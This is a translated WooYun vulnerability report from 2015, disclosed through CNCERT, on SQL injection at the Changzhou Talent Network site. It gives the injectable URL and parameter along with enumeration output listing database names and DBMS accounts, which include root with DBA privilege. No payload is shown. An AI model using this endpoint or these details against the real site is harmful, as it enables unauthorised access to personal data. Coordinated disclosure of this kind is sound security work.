
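Vulnerability summary

Bug ID: wooyun-2015-095978

Vulnerability title: Injection on the main site of Changzhou Talent Network (常州人才网) - so much data

Related vendor: cncert (National Internet Emergency Center)

Vulnerability author: XXXQQ

Submitted: 2015-02-06 18:28

Fixed: 2015-03-23 18:30

Published: 2015-03-23 18:30

Vulnerability type: SQL injection vulnerability

Severity: High

Self-assessed Rank: 15

Vulnerability status: Handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]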



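Vulnerability details

Disclosure status:

2015-02-06: Details reported to the vendor; awaiting vendor handling
2015-02-11: Vendor has confirmed; details disclosed to the vendor only
2015-02-21: Details disclosed to core white hats and experts in related fields
2015-03-03: Details disclosed to regular white hats
2015-03-13: Details disclosed to intern white hats
2015-03-23: Details disclosed to the public

Brief description:

The main site has an injection, the privilege is even DBA, and there is a lot of data

Detailed description:

Address: http://www.czrc.com.cn/wlzpjxh/WGR25.php?id=1698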



current user:    'czrc2014@%'
current database: 'czrcphpjob'
current user is DBA: True
available databases [6]:
[*] czrcphpjob
[*] czrctemp
[*] information_schema
[*] mysql
[*] phpjob
[*] test_czrc
database management system users [4]:
[*] 'czrc2014'@'%'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'


Proof of vulnerability:


Fix:

Please check carefully

Copyright notice: when reposting, please credit the source XXXQQ@WooYun


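Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-02-11 13:51

Vendor reply:

CNVD confirms the situation described and has passed it on, via CNCERT, to the Jiangsu branch center, which will follow up and coordinate with the organization managing the website to handle it.

Latest status:

None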

